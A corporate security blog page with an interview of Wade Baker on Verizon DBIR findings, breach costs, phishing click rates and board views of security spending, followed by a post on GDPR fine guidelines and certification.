We took the next step and contacted Wade for an IOS interview. It was a great opportunity to tap into his deep background in data breach analysis, and our discussion ranged over the DBIR, breach costs, phishing, and what boards look for in security products. What follows is a transcript based on my phone interview with Wade last month.

Inside Out Security: The Verizon Data Breach Investigations Report (DBIR) had been incredibly useful to me in understanding the real-world threat environment. I know one of the first things that caught my attention was that — I think this is pretty much a trend for the last five or six years — external threats or hackers certainly far outweigh insiders.

Wade Baker: Yeah.

IOS: But you’ll see headlines that say just the opposite, the numbers flipped around —‘like 70% of attacks are caused by insiders’. I was wondering if you had any comments on that and perhaps other data points that should be emphasized more?

WB: The whole reason that we started doing the DBIR in the first place, before it was ever a report, is just simply…I was doing a lot of risk-assessment related consulting. And it always really bothered me that I would be trying to make a case, ‘Hey, pay attention to this,’ and I didn’t have much data to back it up.

But there wasn’t really much out there to help me say, ‘This thing on the list is a higher risk because it’s, you know, much more likely to happen than this other thing right here.’

Interesting Breach Statistics

WB: Anyone who’s done those lists knows there’s a bunch of things on this list. When we started doing that, it was kind of a simple notion of, ‘All right, let me find a place where that data might exist, forensic investigations, and I’ll decompose those cases and just start counting things.’

Attributes of incidents, and insiders versus outsiders is one I had always heard —- like you said. Up until that point, 80% of all risk or 80% of all security incidents are insiders. And it’s one of those things that I almost consider it like doctrine at that time in the industry!

When we showed pretty much the exact opposite! This is the one stat that I think has made people the most upset out of my 10 years doing that report!

People would push back and kind of argue with things, but that is the one, like, claws came out on that one, like, ‘I can’t believe you’re saying this.’

There are some nuances there. For instance, when you study data breaches, then it does. Every single data set I ever looked at was weighted toward outsiders.

When you study all security incidence — no matter what severity, no matter what the outcome — then things do start leaning back toward insiders. Just when you consider all the mistakes and policy violations and, you know, just all that kind of junk.

Social attacks and phishing have been on the rise in recent years. (Source: Verizon DBIR)

IOS: Right, yes.

WB: I think defining terms is important, and one reason why there’s disagreement. Back to your question about other data points in the report that I love.

The ones that show the proportion of breaches that tie back to relatively simple attacks, which could have been thwarted by relatively cheap defenses or processes or technologies.

I think we tend to have this notion — maybe it’s just an excuse — that every attack is highly sophisticated and every fix is expensive. That’s just not the case!

The longer we believe those kind of things, I think we just sit back and don’t actually do the sometimes relatively simple stuff that needs to be done to address the real threat.

I love that one, and I also love the time to the detection. We threw that in there almost as a whim, just saying, ‘It seems like a good thing to measure about a breach.’

We wanted to see how long it takes, you know, from the time they start trying to link to it, and from the time they get inside to the time they find data, and from the time they find the data to exfiltrating it. Then of course how long it takes to detect it.

I think that was some of the more fascinating findings over the years, just concerning that.

IOS: I’m nodding my head about the time to discovery. Everything we’ve learned over the last couple of years seems to validate that. I think you said in one of your reports that the proper measurement unit is months. I mean, minimally weeks, but months. It seems to be verified by the bigger hacks we’ve heard about.

WB: I love it because many other people started publishing that same thing, and it was always months! So it was neat to watch that measurement vetted out over multiple different independent sources.

Breach Costs

IOS: I’m almost a little hesitant to get into this, but recently you started measuring breach cost based o proprietary insurance data. I’ve been following the controversy.

Could you just talk about it in general and maybe some of your own thoughts on the disparities we’ve been seeing in various research organizations?

WB: Yeah, that was something that for so long, because of where we got our information, it was hard to get all of the impact side out of a breach. Because you do a forensic investigation, you can collect really good info about how it happened, who did it, and that kind of thing, but it’s not so great six months or a year down the road.

You’re not still inside that company collecting data, so you don’t get to see the fallout unless it becomes very public (and sometimes it does).

We were able to study some costs — like the premier, top of line breach cost stats you always hear about from Ponemon.

IOS: Yes.

WB: And I’ve always had some issues with that, not to get into throwing shade or anything. The per record cost of a breach is not a linear type equation, but it’s treated like that.

What you get many times is something like an Equifax, 145 million records. Plus you multiply that by $198 per record, and we get some outlandish cost, and you see that cost quoted in the headlines. It’s just not how it works!

There’s a decreasing cost per record as you get to larger breaches, which makes sense.

There are other factors there that are involved. For instance, I saw a study from RAND, by Sasha Romanosky recently, where after throwing in predictors like company revenue and whether or not they’ve had a breach before — repeat offenders so to speak — and some other factors, then she really improves the cost prediction in the model.

I think those are the kind of things we need to be looking at and trying to incorporate because I think the number of records is probably, at best, describes about a third … I don’t even know if it gets to a half of the cost on the breach.

Breach costs do not have a linear relationship with data records! (Source: 2015 Verizon DBIR)

IOS: I did look at some of these reports andI’m a little skeptical about the number of records itself as a metric because it’s hard to know this, I think.

But if it’s something you do on a per incident basis, then the numbers look a little bit more comparable to Ponemon.

Do you think it’s a problem, looking at it on per record basis?

WB: First of all, an average cost per record, I would like to step away from that as a metric, just across the board.  But tying cost to the number of records probably…I mean, it works better for, say, consumer data or payment card data or things like that where the costs are highly associated with the number of people affected. You then get into cost of credit monitoring and the notifications. All of those type things are certainly correlated to how many people or consumers are affected.

When you talk about IP or other types of data, there’s just almost no correlation. How do you count a single stolen document as a record? Do you count megabytes? Do you count documents?

Those things have highly varied value depending on all kinds of circumstances. It really falls down there.

What Boards Care About

IOS: I just want to get back to your O’Reilly talk. And one of the things that also resonated with me was the disconnect between the board and the CISOs who have to explain investments. And you talk about that disconnect.

I was looking at your blog and Cyber Balance Sheet reports, and you gave some examples of this — something that the CISO thinks is important, the board is just saying, ‘What?’

So I was wondering if you can mention one or two examples that would give some indication of this gap?

WB: The CISOs have been going to the board probably for several rounds now, maybe years, presenting information, asking for more budgets, and the board is trying to ‘get’ what they need to build a program to do the right things.

Pretty soon, many boards start asking, ‘When are we done? We spent money on security last month. Why are we doing it this quarter too?’

Security as a continual and sometimes increasing investment is different than a lot of other things that they look at. They think of, ‘Okay, we’re going to spend money on this project, get it done, and we’re going to have this value at the end of that.’

We can understand those things, but security is just not like that. I’ve seen it a lot this breaking down with CISOs, who are coming from, ‘We need to do this project.’

You lay on top of all this that the board is not necessarily going to see the fruits of their investment in security! Because if it works, they don’t see anything bad at all.

Another problem that CISOs have is ‘how do I go to them when we haven’t had any bad things happen, and asking for more money?’ It’s just a conversation where you should be prepared to say why that is —  connect these things to the business.

By doing these things, we’re enabling these pieces of the business to function properly. It’s a big problem, especially for more traditional boards that are clearly focused on driving revenue and other areas of the business.

IOS: Right. I’m just thinking out loud now … Is the board comparing it to physical security, where I’m assuming you make this initial investment in equipment, cameras, and recording and whatever, and then your costs, going forward, are mostly people or labor costs?

They probably are looking at it and saying,  ‘Why am I spending more? Why am I buying more cameras or more modern equipment?’

WB: I think so! I’ve never done physical security, other than as a sideline to information security. Even if there are continuing costs, they live in that physical world. They can understand why, ‘Okay, we had a break-in last month, so we need to, I don’t know, add a guard gate or something like that.’ They get why and how that would help.

Whereas in the logical or cyber security world, they sometimes really don’t understand what you’re proposing, why it would work. If you don’t have their trust, they really start trying to poke holes. Then if you’re not ready to answer the question, things just kind of go downhill from there.

They’re not going to believe that the thing you’re proposing is actually going to fix the problem. That’s a challenge.

IOS: I remember you mentioning during your O’Reilly talk that helpful metaphors can be useful, but it has to be the right metaphor.

WB: Right.

IOS: I mean, getting back to the DBIR. In the last couple of years, there was an uptick in phishing. I think probably this should enter some of these conversations because it’s such an easy way for someone to get inside. For us at Varonis, we’re been focused on ransomware lately, and there’s also DDoS attacks as well.

Will these new attack shift the board’s attention to something they can really understand—-since these attacks actually disrupt operations?

WB: I think it can because things like ransomware and DDoS, are things that are apparent just kind of in and of themselves. If they transpire, then it becomes obvious and there are bad outcomes.

Whereas more cloak-and dagger stealing of intellectual property or siphoning a bunch of consumer data is not going to become apparent, or if it is, it’s months down the road, like we talked about earlier.

I think these things are attention-getters within a company, attention-getters from the headlines. I mean, from what I’ve heard over the past year, as this ransomware has been steadily increasing, it has definitely received the board’s attention!

I think it is a good hook to get in there and show them what they’re doing. And ransomware is a good one because it has a corporate aspect and a personal aspect.

You can talk to the board about, ‘Hey, you know, this applies to us as a company, but this is a threat to you in your laptop in your home as well. What about all those pictures that you have? Do you have those things backed up? What if they got on your data at home?’

And then walk through some of the steps and make it real. I think it’s an excellent opportunity for that. It’s not hype, it’s actually occurring and top of the list in many areas!

Contrary to conventional wisdom, corporate board of directors understand the value of data protection. (Source: Cyber Balance Sheet)

IOS: This brings something else to mind. Yes, you could consider some of these breaches as a cost of doing business, but if you’re allowing an outsider to get access to all your files, I would think, high-level executives would be a little worried that they could find their emails. ‘Well, if they can get in and steal credit cards, then they can also get into my laptop.’

I would think that alone would get them curious!

WB: To be honest, I have found that most of the board members that I talk to, they are aware of security issues and breaches much more than they were five to ten years ago. That’s a good thing!

They might sit on boards of other companies, and we’ve had lots of reporting of the chance that a board member has been with a company that’s experienced a breach or knows a buddy who has, is pretty good by now. So it’s a real problem in their mind!

But I think the issue, again, is how do you justify to them that the security program is making that less likely? And many of them are terrified of data breaches, to be honest.

Going back to that Cyber Balance Sheet report, I was surprised when we asked board members what is the biggest value that security provides — you know, kind of the inverse of your biggest fear? They all said preventing data breaches. And I would have thought they’d say, ‘Protect the brand,’ or ‘Drive down risk,’ or something like that. But they answered, ‘Prevent data breaches.’

It just shows you what’s at the top of their minds! They’re fearful of that and they don’t want that to happen. They just don’t have a high degree of trust that the security program will actually prevent them.

IOS: I have to say, when I first started at Varonis, some of these data breach stories were not making the front page of The New York Times or The Washington Post, and that certainly has changed. You can begin to understand  the fear. Getting back to something you said earlier about how simple approaches, or as we call it block-and-tackle, can prevent breaches.

Another way to mitigate the risk of these breaches is something that you’ve probably heard of, Privacy by Design, or Security by Design. One of the principles is just simply reduce the data that can cause the risk.

Don’t collect as much, don’t store as much, and delete it when it’s no longer used. Is that a good argument to the board?

WB: I do, and I think there are several approaches. I’ve given this recommendation fairly regularly, to be honest: minimize the data that you’re collecting. Because I think a lot of companies don’t need as much data as they’re collecting! It’s just easy and cheap to collect it these days, so why not?

Helping organizations understand that it is a risk decision! Tthat’s not just a cost decision. It is important. And then of what you collect, how long do you retain it?

Because the longer you retain it and the more you collect, you’re sitting on a mountain of data and you can become a target of criminals just through that fact.
For the data that you do have and you do need to retain … I’m a big fan of trying to consolidate it and not let it spread around the environment.

One of the metrics I like to propose is, ‘Okay, here’s the data that’s important to me. We need to protect it.’ Ask people where that lives or how many systems that should be stored on in the environment, and then go look for it.

If you can multiply that number by like 3 or 5 or 10 sometimes. And that’s the real answer! It’s a good metric to strive for: the number of target systems that that information should reside within. many breaches come from areas where that should not have been.

Security Risk Metrics

IOS: That leads to the next question about risk metrics. One we use at Varonis is PII data that has Windows permissions marked for Everyone. They’re always surprised during assessments when they see how large it is.

This relates to stale data. It could be, you know, PII data that hasn’t been touched in a while. It’s sitting there, as you mentioned.  No one’s looking at it, except the hackers who will get in and find it!

Are there other good risk metrics specifically related to data?

WB: Yup, I like those. You mentioned phishing a while ago. I like stats such as the number of employees that will click-through, say, if you do a phishing test in the organization. I think that’s always kind of an eye-opening one because boards and others can realize that, ‘Oh, okay. That means we got a lot of people clicking, and there’s really no way we can get around that, so that forces us to do something else.’

I’m a fan of measuring things like number of systems compromised in any given time, and then the time that it takes to clean those up and drive those two metrics down, with a very focused effort over time, to minimize them. You mentioned people that have…or data that has Everyone access.

Varonis stats on loosely permissioned folders.

IOS: Yes.

WB: I always like to know, whether it’s a system or an environment or a scope, how many people have admin access! Because we highly over-privileged in most security environments.

I’ve seen eyes pop, where people say, ‘What? We can’t possibly have that many people that have that level of need to know on…for that kind of thing.’ So, yeah, that’s a few off the top of my head.

IOS: Back to phishing. I interviewed Zinaida Benenson a couple months ago — she presented at Black Hat. She did some interesting research on phishing and click rates. Now, it’s true that she looked at college students, but the rates were  astonishing. It was something like 40% were clicking on obvious junk links in Facebook messages and about 20% in email spam.

She really feels that someone will click and it’s just almost impossible to prevent that in an organization. Maybe as you get a little older, you won’t click as much, but they will click.

WB: I’ve measured click rates at about 23%, 25%. So 20% to 25% in organizations. And not only in organizations, but organizations that paid to have phishing trials done. So I got that data from, you know, a company that provides us phishing tests.

You would think these would be the organizations that say, ‘Hey, we have a problem, I’m aware. I’m going to the doctor.’ Even among those, where one in four are clicking. By the time an attacker sends 10 emails within the organization, there’s like a 99% rate that someone is going to click.

Students will click on obvious spammy links. (Source: Zinaida Benenson’s 2016 Black Hat presentation)

IOS: She had some interesting things to say about curiosity and feeling bold. Some people, when they’re in a good mood, they’ll click more.

I have one more question on my list …  about whether data breaches are a cost of business or are being treated as a cost of business.

WB: That’s a good one.

IOS: I had given an example of shrinkage in retail as a cost of business. Retailers just always assume that, say, there’s a 5% shrinkage. Or is security treated — I hope it will be treated — differently?

WB: As far as I can tell, we do not treat it like that. But I’ll be honest, I think treating it a little bit like that might not be a bad thing! In other words, there have been some studies that look at the losses due to breaches and incidents versus losses like shrinkage and other things that are just very, very common, and therefore we’re not as fearful of them.

Shrinkage takes many, many more…I can’t remember what the…but it was a couple orders of magnitude more, you know, for a typical retailer than data breaches.

We’re much more fearful of breaches, even at the board level. And I think that’s because they’re not as well understood and they’re a little bit newer and we haven’t been dealing with it.

When you’re going to have certain losses like that and they’re fairly well measured, you can draw a distribution around them and say that I’m 95% confident that my losses are going be within this limit.

Then that gives you something definite to work with, and you can move on. I do wish we could get there with security, where we figure out that, ‘All right, I am prepared to lose this much.”

Yes, we may have a horrifying event that takes us out of that, and I don’t want to have that. We can handle this, and we handle that through these ways. I think that’s an important maturity thing that we need to get to. We just don’t have the data to get there quite yet.

IOS: I hear what you’re saying. But there’s just something about security and privacy that may be a little bit different …

WB: There is. There certainly is! The fact that security has externalities where it’s not just affecting my company like shrinkage. I can absorb those dollars. But my failures may affect other people, my partners, consumers and if you’re in critical infrastructure, society. I mean that makes a huge difference!

IOS: Wade, this has been an incredible discussion on topics that don’t get as much attention as they should.

Thanks for your insights.

WB: Thanks Andy. Enjoyed it!

Do Your GDPR Homework and Lower Your Chance of Fines

Do Your GDPR Homework and Lower Your Chance of Fines

Advice that was helpful during your school days is also relevant when it comes to complying with the General Data Protection Regulation (GDPR): do your homework because it counts for part of your grade! In the case of the GDPR, your homework assignments involve developing and implementing privacy by design measures, and making sure these policies are published and known about by management.

Taking good notes and doing homework assignments came to my mind when reading the new guideline published last month on GDPR fines. Here’s what the EU regulators have to say:

Rather than being an obligation of goal, these provisions introduce obligations of means, that is, the controller must make the necessary assessments and reach the appropriate conclusions. The question that the supervisory authority must then answer is to what extent the controller “did what it could be expected to do” given the nature, the purposes or the size of the processing, seen in light of the obligations imposed on them by the Regulation’

The supervising authority referenced above is what we used to call the data protection authority or DPA, which is in charge of enforcing the GDPR in an EU country. So the supervising authority is supposed to ask the controller, EU-speak for the company collecting the data, whether they did their homework — “expected to do” — when determining fines involved in a GDPR complaint.

Teachers Know Best

There are other factors in this guideline that affect the level of fines, including the number of data subjects, the seriousness of the damage (“risks to rights and freedoms”), the categories of data that have been accessed, and willingness to cooperate and help the supervisory authority. You could argue that some of this is out of your control once the hackers have broken through the first level of defenses.

But what you can control is the effort a company has put into their security program to limit the security risks.

I’m also reminded of what Hogan Lovells’ privacy attorney Sue Foster told us during an interview about the importance of “showing your work”.  In another school-related analogy, Foster said you can get “partial credit” if you show that to the regulators after an incident that you have security processes in place.

She also predicted we’d get more guidance and that’s what the aforementioned document does: explains what factors are taken into account when issuing fines in GDPR’s two-tiered system of either 2% or 4% of global revenue. Thanks Sue!

Existing Security Standards Count

The guideline also contains some very practical advice on compliance. Realizing that many companies are already rely on existing data standards, such as ISO 27001, the EU regulators are willing to give some partial credit if you follow these standards.

… due account should be taken of any “best practice” procedures or methods where these exist and apply. Industry standards, as well as codes of conduct in the respective field or profession are important to take into account. Codes of practice might give indication of the level of knowledge about different means to address typical security issues associated with the processing.

For those who want to read the fine print in the GDPR, they  can refer to article 40 (“Codes of Conduct”). In short it says that standards associations can submit their security controls, say PCI DSS, to the European Data Protection Board (EDPB) for approval. If a controller then follows an officially approved “code of conduct”, then this can dissuade the supervising authority from taking actions, including issuing fines, as long as the standards group — for example, the PCI Security Standards Council — has its own monitoring mechanism to check on compliance.

Based on this particular GDPR guideline, it will soon be the case that those who have done the homework of being PCI compliant will be in a better position to deal with EU regulators.

Certifiably GDPR

The GDPR, though, goes a step further. It leaves open a path to official certification of a controller’s data operations!

In effect, the supervising authorities have the power (through article 40) to certify a controller’s operations as GDPR compliant. The supervising authority itself can also accredit other standards organization to issue these certifications as well.

In any case, the certifications will expire after three years at which point the company will need to re-certify.

I should add these certifications are entirely voluntary, but there’s obvious benefits to many companies. The intent is to leverage the private sector’s existing data standards, and give companies a more practical approach to compliance with the GDPR’s technical and administrative requirements.

The EDPB is also expected to develop certification marks and seals for consumers, as well as a registry of certified companies.

We’ll have to wait for more details to be published by the regulators on GDPR certification.

In the short term, companies that already have programs in place to comply with PCI DSS, ISO 27001, and other data security standards should potentially be in a better position with respect to GDPR fines.

And in the very near future, a “European Data Protection Seal” might just become a sought after logo on company web sites.

Want to reduce your GDPR fines? Varonis helps support many different data security standards. Find out more!